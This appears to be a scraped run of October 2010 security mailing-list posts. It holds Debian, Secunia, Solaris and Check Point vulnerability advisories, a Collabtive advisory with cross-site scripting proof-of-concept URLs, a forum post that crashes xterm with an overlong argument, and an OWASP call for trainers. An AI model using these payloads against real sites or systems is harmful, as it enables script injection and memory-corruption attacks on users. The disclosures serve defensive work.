[SECURITY] [DSA 2116-1] New poppler packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2116-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff October 12, 2010 http://www.debian.org/security/faq - Package: poppler Vulnerability : several Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2010-3702 CVE-2010-3704 Debian Bug : 599165 Joel Voss of Leviathan Security Group discovered two vulnerabilities in the Poppler PDF rendering library, which may lead to the execution of arbitrary code if a malformed PDF file is opened. For the stable distribution (lenny), these problems have been fixed in version 0.8.7-4. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your poppler packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/p/poppler/poppler_0.8.7.orig.tar.gz Size/MD5 checksum: 1469587 9af81429d6f8639c357a5eed25583365 http://security.debian.org/pool/updates/main/p/poppler/poppler_0.8.7-4.diff.gz Size/MD5 checksum:23876 219c5db15e7e0ad3ce01c45b5d2d17b5 http://security.debian.org/pool/updates/main/p/poppler/poppler_0.8.7-4.dsc Size/MD5 checksum: 1481 a2d28a0e06fd0b226e9e87d88aab52e8 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/poppler/libpoppler3_0.8.7-4_alpha.deb Size/MD5 checksum: 891456 eecf847b41f68e67cfa250c239ab95ff http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib3_0.8.7-4_alpha.deb Size/MD5 checksum: 220410 cdc18593a727b1a80279ad941a929dee http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-3_0.8.7-4_alpha.deb Size/MD5 checksum: 329946 83a82f4a995727adac2a9cbb19cd0705 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.8.7-4_alpha.deb Size/MD5 checksum: 303118 8407f059f1395ad93f765cdcf70f6246 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt2_0.8.7-4_alpha.deb Size/MD5 checksum: 180578 f625e16840c1262de1e33579bfff3e00 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.8.7-4_alpha.deb Size/MD5 checksum: 197172 2573621fc79b03251735690bfd818f5e http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.8.7-4_alpha.deb Size/MD5 checksum: 1334994 5fbda5e9f2b3824d3d7ccbb1bcf000d0 http://security.debian.org/pool/updates/main/p/poppler/poppler-dbg_0.8.7-4_alpha.deb Size/MD5 checksum: 3204616 7c7c37da8b894e462b2758524365ca46 http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.8.7-4_alpha.deb Size/MD5 checksum: 234854 06e4977b32fb63577a918c110147e5f6 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-dev_0.8.7-4_alpha.deb Size/MD5 checksum: 452718 751233edf2ec85fd1e095893124f8909 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt-dev_0.8.7-4_amd64.deb Size/MD5 checksum: 184848 ed2abc9b1edd4cde56eb40b9b775cf45 http://security.debian.org/pool/updates/main/p/poppler/libpoppler-dev_0.8.7-4_amd64.deb Size/MD5 checksum: 1119492 16725109ae348df90c30896be4a0c5de http://security.debian.org/pool/updates/main/p/poppler/poppler-utils_0.8.7-4_amd64.deb Size/MD5 checksum: 232702 2e7740b7098cd91493f178745b966d4a http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt2_0.8.7-4_amd64.deb Size/MD5 checksum: 178414 497a3f7cbff9acdb0b01d58aae33415a http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-dev_0.8.7-4_amd64.deb Size/MD5 checksum: 358376 461a59da2c6b0c7531bba1a385f3607d http://security.debian.org/pool/updates/main/p/poppler/libpoppler-glib-dev_0.8.7-4_amd64.deb Size/MD5 checksum: 275318 3c6b86fb8a57e9f17fbe058a36fa426e http://security.debian.org/pool/updates/main/p/poppler/libpoppler-qt4-3_0.8.7-4_amd64.deb Size/MD5 checksum: 314086 3381ccceeaa1d2727f331d92b59818dd http://security.debian.org/pool/updates/main/p/poppler/poppler-dbg_0.8.7-4_amd64.deb Size/MD5 checksum: 3148992
Collabtive Multiple Vulnerabilities
ANATOLIA SECURITY ADVISORY ### ADVISORY INFO ### + Title: Collabtive Multiple Vulnerabilities + Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-003.txt + Advisory ID: 2010-003 + Version: 0.65 + Date: 12/10/2010 + Impact: Gaining Administrative Privileges - Execute Malicious Javascript Codes + CWE-ID: 352 (Cross-site Request Forgery) - 79 (Cross-site Scripting) + Credit: Anatolia Security ### VULNERABLE PRODUCT ### + Description: Collabtive provides a web based platform to bring the project management process and documentation online. Collabtive is an open source solution with features and functionality similar to proprietary software such as BaseCamp. + Homepage: http://www.collabtive.com ### VULNERABILITY DETAILS ### I. Non-persistent Cross-site Scripting -- + Description: Application insert HTTP y parameter in manageajax.php and HTTP pic parameter in thumb.php into html output and fails while sanitize user supplied these inputs. Attackers can execute malicious javascript codes or hijacking PHPSESSID for privilege escalation. + Exploit/POC: http://target/manageajax.php?action=newcaly=scriptalert(/XSS/)/script http://target/thumb.php?pic=scriptalert(/XSS/)/script II. Cross-site Request Forgery -- + Description: Collabtive affects from Cross-site Request Forgery. Technically, attacker can create a specially crafted page and force collabtive administrators to visit it and can gain administrative privilege. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha and asking old password for critical actions. + Exploit/POC: http://www.anatoliasecurity.com/exploits/collabtive-csrf-xploit.txt III. Stored Cross-site Scripting + Description: Collabtive has Stored Cross-site Scripting vulnerability. Every user can change their usernames and application allows HTML codes and stores in database. + Exploit/POC: Change username to userscriptalert(/AS/)/script.
ubuntu 10.04 xterm heap overflow,can it be exploit ?
Hi,all ! I find xterm on ubuntu 10.04 have a local heap overflow, I don't known that can it be exploit on glibc 2.11 . detail : watercl...@ubuntu:~/Downloads$ ls -l `which xterm` -rwxr-sr-x 1 root utmp 35 2010-03-31 17:47 /usr/bin/xterm watercl...@ubuntu:~/Downloads$ xterm -fb `perl -e 'print Ax4000'` *** glibc detected *** xterm: munmap_chunk(): invalid pointer: 0x080bd314 *** === Backtrace: = /lib/tls/i686/cmov/libc.so.6(+0x6b591)[0x243591] /lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x24480e] xterm[0x8062c70] xterm[0x8064b34] xterm[0x805515d] /usr/lib/libXt.so.6(+0x23e30)[0x4a2e30] /usr/lib/libXt.so.6(+0x23fb5)[0x4a2fb5] /usr/lib/libXt.so.6(XtRealizeWidget+0x9d)[0x4a325d] xterm[0x8058176] xterm[0x8069a08] xterm[0x806bf78] /lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0x1eebd6] xterm[0x804d6a1] === Memory map: 0011-0012b000 r-xp 08:01 147/lib/ld-2.11.1.so 0012b000-0012c000 r--p 0001a000 08:01 147/lib/ld-2.11.1.so 0012c000-0012d000 rw-p 0001b000 08:01 147/lib/ld-2.11.1.so 0012d000-0012e000 r-xp 00:00 0 [vdso] 0012e000-0014 r-xp 08:01 4191 /usr/lib/libXft.so.2.1.13 0014-00141000 r--p 00011000 08:01 4191 /usr/lib/libXft.so.2.1.13 00141000-00142000 rw-p 00012000 08:01 4191 /usr/lib/libXft.so.2.1.13 00142000-00198000 r-xp 08:01 2715 /usr/lib/libXaw7.so.7.0.0 00198000-00199000 r--p 00055000 08:01 2715 /usr/lib/libXaw7.so.7.0.0 00199000-0019f000 rw-p 00056000 08:01 2715 /usr/lib/libXaw7.so.7.0.0 0019f000-001a rw-p 00:00 0 001a-001d4000 r-xp 08:01 4408 /lib/libncurses.so.5.7 001d4000-001d5000 ---p 00034000 08:01 4408 /lib/libncurses.so.5.7 001d5000-001d7000 r--p 00034000 08:01 4408 /lib/libncurses.so.5.7 001d7000-001d8000 rw-p 00036000 08:01 4408 /lib/libncurses.so.5.7 001d8000-0032b000 r-xp 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032b000-0032c000 ---p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032c000-0032e000 r--p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032e000-0032f000 rw-p 00155000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032f000-00332000 rw-p 00:00 0 00332000-0036 r-xp 08:01 850/usr/lib/libfontconfig.so.1.4.4 0036-00361000 r--p 0002d000 08:01 850/usr/lib/libfontconfig.so.1.4.4 00361000-00362000 rw-p 0002e000 08:01 850/usr/lib/libfontconfig.so.1.4.4 00362000-0047b000 r-xp 08:01 4046 /usr/lib/libX11.so.6.3.0 0047b000-0047c000 r--p 00118000 08:01 4046 /usr/lib/libX11.so.6.3.0 0047c000-0047e000 rw-p 00119000 08:01 4046 /usr/lib/libX11.so.6.3.0 0047e000-0047f000 rw-p 00:00 0 0047f000-004ce000 r-xp 08:01 3718 /usr/lib/libXt.so.6.0.0 004ce000-004cf000 r--p 0004e000 08:01 3718 /usr/lib/libXt.so.6.0.0 004cf000-004d2000 rw-p 0004f000 08:01 3718 /usr/lib/libXt.so.6.0.0 004d2000-004e7000 r-xp 08:01 2723 /usr/lib/libXmu.so.6.2.0 004e7000-004e8000 r--p 00014000 08:01 2723 /usr/lib/libXmu.so.6.2.0 004e8000-004e9000 rw-p 00015000 08:01 2723 /usr/lib/libXmu.so.6.2.0 004e9000-004fe000 r-xp 08:01 4016 /usr/lib/libICE.so.6.3.0 004fe000-004ff000 r--p 00014000 08:01 4016 /usr/lib/libICE.so.6.3.0 004ff000-0050 rw-p 00015000 08:01 4016 /usr/lib/libICE.so.6.3.0 0050-00502000 rw-p 00:00 0 00502000-00573000 r-xp 08:01 2033 /usr/lib/libfreetype.so.6.3.22 00573000-00577000 r--p 0007 08:01 2033 /usr/lib/libfreetype.so.6.3.22 00577000-00578000 rw-p 00074000 08:01 2033 /usr/lib/libfreetype.so.6.3.22 00578000-0058 r-xp 08:01 4050 /usr/lib/libXrender.so.1.3.0 0058-00581000 r--p 7000 08:01 4050 /usr/lib/libXrender.so.1.3.0 00581000-00582000 rw-p 8000 08:01 4050 /usr/lib/libXrender.so.1.3.0 00582000-0059 r-xp 08:01 4091 /usr/lib/libXext.so.6.4.0 0059-00591000 r--p d000 08:01 4091 /usr/lib/libXext.so.6.4.0 00591000-00592000 rw-p e000 08:01 4091 /usr/lib/libXext.so.6.4.0 00592000-005a1000 r-xp 08:01 2709 /usr/lib/libXpm.so.4.11.0 005a1000-005a2000 r--p e000 08:01 2709 /usr/lib/libXpm.so.4.11.0 005a2000-005a3000 rw-p f000 08:01 2709 /usr/lib/libXpm.so.4.11.0 005a3000-005a5000 r-xp 08:01 1053685 /lib/tls/i686/cmov/libdl-2.11.1.so 005a5000-005a6000 r--p 1000 08:01 1053685 /lib/tls/i686/cmov/libdl-2.11.1.so 005a6000-005a7000 rw-p 2000 08:01 1053685 /lib/tls/i686/cmov/libdl-2.11.1.so 005a7000-005ba000 r-xp 08:01 4125 /lib/libz.so.1.2.3.3 005ba000-005bb000 r--p 00012000 08:01 4125 /lib/libz.so.1.2.3.3 005bb000-005bc000 rw-p 00013000 08:01 4125 /lib/libz.so.1.2.3.3 005bc000-005e r-xp 08:01 90 /lib/libexpat.so.1.5.2 005e-005e2000 r--p 00024000 08:01 90 /lib/libexpat.so.1.5.2
Secunia Research: Microsoft Excel Ghost Record Type Parsing Vulnerability
== Secunia Research 12/10/2010 - Microsoft Excel Ghost Record Type Parsing Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Excel 2002 SP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions. Product Link: http://office.microsoft.com/en-us/excel/default.aspx == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by missing input validation in a conversion routine when parsing a certain record type. This can be exploited to corrupt memory outside the bounds of an allocated heap buffer via an overly large range specified by two record fields. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-080. == 6) Time Table 19/04/2010 - Vendor notified. 19/04/2010 - Vendor response. 27/04/2010 - Vendor provides status update. 25/05/2010 - Vendor provides status update. 30/09/2010 - Vendor provides status update. 12/10/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3242 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-65/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
DDIVRT-2009-28 Sun Solaris 10 rpc.cmsd Buffer Overflow and Denial of Service (CVE-2010-3509)
Title - DDIVRT-2009-28 Sun Solaris 10 rpc.cmsd Buffer Overflow and Denial of Service (CVE-2010-3509) Severity High Date Discovered --- November 3, 2009 Discovered By - Digital Defense, Inc. Vulnerability Research Team Credit: Alex Kaszczuk, Alan Chin, Jose R. Hernandez and r...@b13$ Vulnerability Description - The rpc.cmsd service contains an integer overflow which can allow a malicious unauthenticated user to cause a denial of service, or remotely execute arbitrary code with root privileges. Solution Description Sun has addressed this vulnerability in Sun bugID 6214701. The patch is available for download through the Oracle October Critical Patch Update (CPU) released on 12 October, 2010. Tested Systems / Software (with versions) -- Sun Solaris 10 (10/09 Download) Vendor Contact -- Vendor Name: Sun Microsystems Vendor Website: http://www.sun.com/
Secunia Research: Microsoft Excel Record Parsing Integer Overflow Vulnerability
== Secunia Research 12/10/2010 - Microsoft Excel Record Parsing Integer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Excel 2002 SP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions. Product Link: http://office.microsoft.com/en-us/excel/default.aspx == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by a sign-extension error and integer overflow when processing a certain record type and can be exploited to cause a heap-based buffer overflow via a specially crafted Excel file. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-080. == 6) Time Table 29/03/2010 - Vendor notified. 30/03/2010 - Vendor response. 27/04/2010 - Vendor provides status update. 30/09/2010 - Vendor provides status update. 12/10/2010 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3230 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-64/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
[SECURITY] [DSA 2120-1] New postgresql-8.3 packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2120-1 secur...@debian.org http://www.debian.org/security/ Florian Weimer October 12, 2010 http://www.debian.org/security/faq - Package: postgresql-8.3 Vulnerability : privilege escalation Problem type : remote Debian-specific: no CVE Id(s) : CVE-2010-3433 Tim Bunce discovered that PostgreSQL, a database server software, does not properly separate interpreters for server-side stored procedures which run in different security contexts. As a result, non-privileged authenticated database users might gain additional privileges. Note that this security update may impact intended communication through global variables between stored procedures. It might be necessary to convert these functions to run under the plperlu or pltclu languages, with database superuser privileges. This security update also includes unrelated bug fixes from PostgreSQL 8.3.12. For the stable distribution (lenny), this problem has been fixed in version 8.3_8.3.12-0lenny1. For the unstable distribution (sid), this problem has been fixed in version 8.4.5-1 of the postgresql-8.4 package. We recommend that you upgrade your PostgreSQL packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.12-0lenny1.dsc Size/MD5 checksum: 2313 1663c4c9915f51a31ff6e6b7b3bda545 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.12.orig.tar.gz Size/MD5 checksum: 13955500 03b56e23c3bcdc36eee3156334b8b97b http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.12-0lenny1.diff.gz Size/MD5 checksum:52479 e39048a272b6085ad0dce1933a1b1f5b Architecture independent packages: http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc_8.3.12-0lenny1_all.deb Size/MD5 checksum: 273756 95f2dc5525e464769715c302d9141df4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib_8.3.12-0lenny1_all.deb Size/MD5 checksum: 273824 0c762a2fed4bf2b85120b4fc6a3c5d09 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.12-0lenny1_all.deb Size/MD5 checksum: 2213230 61228c350de23b18674fc3a2b0d11e44 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql_8.3.12-0lenny1_all.deb Size/MD5 checksum: 273944 b89079dac539bbbaed5794bee7f4d3c3 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client_8.3.12-0lenny1_all.deb Size/MD5 checksum: 273928 744cf8e343f7c1c658eb64f976797736 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 293706 41c14c7e0ea6dc1f6b4015fa0b3bdc9a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 638416 e3c55350fc57d889281157d9047da119 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 498186 27c76b0e919d5d98d5573dd3cf8a29b4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 1720192 853975a17102b21ae9bcfe8ada0e8f20 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 412750 6514158a601f1f553c2930a647f777a1 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 282464 ceca3e409d28a80f4fc409a01f605065 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 292584 0435ab52cdf05454cc911432c03276fa http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 850022 2ff3573cbdd9dd0d89666a619c7e43b9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.12-0lenny1_alpha.deb Size/MD5 checksum: 302546 e1dfd28c264c5f99ce6e6e7b25500b61
Internet Explorer Uninitialized Memory Corruption Vulnerability - CVE-2010-3331
Dear List, I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Internet Explorer Uninitialized Memory Corruption Vulnerability CVE-2010-3331 - MS10-071 INTRODUCTION There exists a vulnerability within the way internet explorer handles specific objects that has not been correctly initialized or has been deleted, which leads to uninitialized memory reference and code execution. This vulnerability can be triggered thru different vectors, been Microsoft Word one of the tested ones. This problem was confirmed in the following versions of Internet Explorer and Windows, other versions maybe also affected. Internet Explorer 6 running in All Versions of Windows Internet Explorer 7 running in All Versions of Windows Internet Explorer 8 running in All Versions of Windows MICROSOFT EXPLOTABILITY INDEX In order to help the Microsoft Response Team we did further analysis on the vulnerability and we classify it as: 1 consistent exploit code likely. Important to note again that since the faulty code also appears inside the mshtml.dll other applications may behave differently when triggering the problem (even more when talking about 3rd parties). CVSS Scoring System The CVSS score is: 8.3 Base Score: 10 Temporal Score: 8.3 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C Temporal score is: E:F/RL:OF/RC:C TRIGGERING THE PROBLEM This vulnerability can be triggered by creating a persistent object with class id: CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389. The problem is triggered by the an exploit code available to interested party which causes invalid memory access in all the referred versions. CREDITS This vulnerability was discovered and researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT). Best Regards, Rodrigo. -- Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies
IBWAS'10 CfTraining - Deadline Approaching
Dear all, the deadline for submitting Training proposals for IBWAS'10 is approaching. Please advertise this. (sorry for the spam and for receiving multiple copies of this) Best regards, - 2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10) ISCTE – Lisbon University Institute 25th – 26th November 2010 Lisboa, Portugal http://www.ibwas.com **CALL FOR TRAINING SESSIONS** IBWAS and OWASP is currently soliciting training proposals for the OWASP Ibero-American Web Applications Security 2010 Conference (IBWAS'10) which will take place at ISCTE-IUL, Lisboa, Portugal, on November 24 through November 26, 2010. There will be training courses on November 24 followed by plenary sessions on the 25 and 26 with multiple tracks per day. We are seeking training proposals on the following topics (in no particular order): - Application Threat Modeling - Business Risks with Application Security - Hands-on Source Code Review - Metrics for Application Security - OWASP Tools and Projects - Privacy Concerns with Applications and Data Storage - Secure Coding Practices (J2EE/.NET) - Starting and Managing Secure Development Lifecycle Programs - Technology specific presentations on security such as AJAX, XML, etc - Web Application Security countermeasures - Web Application Security Testing - Web Services, XML and Application Security - Anything else relating to OWASP and Application Security Proposals on topics not listed above but related to the conference (i.e. which are related to Application Security) may also be accepted. To make a submission you must fill out the form available at http://ibwas09.netmust.eu/files/ibwas10/OWASP_IBWAS_2010_CFT.rtf.zip and submit by email to secretar...@ibwas.com. There may be 1 or half a day courses. The proposals must respect the restrictions of the OWASP Speaker Agreement. The conference will reward trainers with at least 30% of the total revenue of their courses, based on a minimum attendance. Courses that attract more students may be granted higher percentages. No other compensation (such as tickets or lodging) will be provided. If you require a different arrangement, please contact the conference chair at the email address below. **Compensation** Instructors and authors will be paid based on the number of students in their training sessions. If the training gathers only the minimum number of students, the compensation will be 30% of the revenue. For each group of 10 extra students enrolled, the compensation will be increased by 5% of the revenue, up to a maximum of 45% of the training revenue. For example, a 1-day training with 10 to 19 students will generate a compensation of 30% of the revenue. For classes of 20 to 29 students, the compensation raises to 35% percent of the revenue. In exceptional cases, different compensation schemes may be accepted. Please contact the conference organization team by email (secretar...@ibwas.com) for details. **Training cost** half-day training: 250 EUR per student 1-day training: 450 EUR per student All prices in Euros (EUR) **Minimum number of students** half-day trainings: 10 students 1-day trainings: 20 students **Important Dates:** Submission deadline is October 13, 2010. Notification of acceptance will be October 20, 2010. Final version is due October 29, 2010. The conference organization team may be contacted by email at secretar...@ibwas.com For more information, please see the following web pages: Conference Website: http://www.ibwas.com, http://www.owasp.org/index.php/IBWAS10 OWASP Speaker Agreement: http://www.owasp.org/index.php/Speaker_Agreement OWASP Website: http://www.owasp.org Easychair conference site: http://www.easychair.org/conferences/?conf=ibwas10 Presentation proposal form: http://ibwas09.netmust.eu/files/ibwas10/OWASP_IBWAS_2010_CFT.rtf.zip ** WARNING: Submissions without all the information requested in the proposal form will not be considered Please forward to all interested practitioners and colleagues. -- Carlos Serrão ISCTE-IUL/ISTA/DCTI | ADETTI-IUL/NetMuST | PT.OWASP
Secunia Research: Microsoft Excel Extra Out of Boundary Record Vulnerability
== Secunia Research 12/10/2010 - Microsoft Excel Extra Out of Boundary Record Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Excel 2002 SP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions. Product Link: http://office.microsoft.com/en-us/excel/default.aspx == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an error when processing Extra Out of Boundary records having an insufficient size and can be exploited to corrupt memory at an arbitrary memory address. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-080. == 6) Time Table 23/04/2010 - Vendor notified. 24/04/2010 - Vendor response. 27/04/2010 - Vendor provides status update. 25/05/2010 - Vendor provides status update. 30/09/2010 - Vendor provides status update. 12/10/2010 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3239 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-63/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Microsoft Excel Lotus 1-2-3 File Parsing Vulnerability
== Secunia Research 12/10/2010 - Microsoft Excel Lotus 1-2-3 File Parsing Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Excel 2002 SP3 * Microsoft Excel 2003 SP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions.. Product Link: http://office.microsoft.com/excel == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by a boundary error in the parsing of certain records in Lotus 1-2-3 workbooks. This can be exploited to cause a heap-based buffer overflow via a Lotus 1-2-3 file containing a specially crafted, overly long record. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-080. == 6) Time Table 09/04/2010 - Vendor notified. 09/04/2010 - Vendor response. 25/05/2010 - Vendor provides status update. 30/09/2010 - Vendor provides status update. 12/10/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3233 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-55/ Complete list of vulnerability reports published by 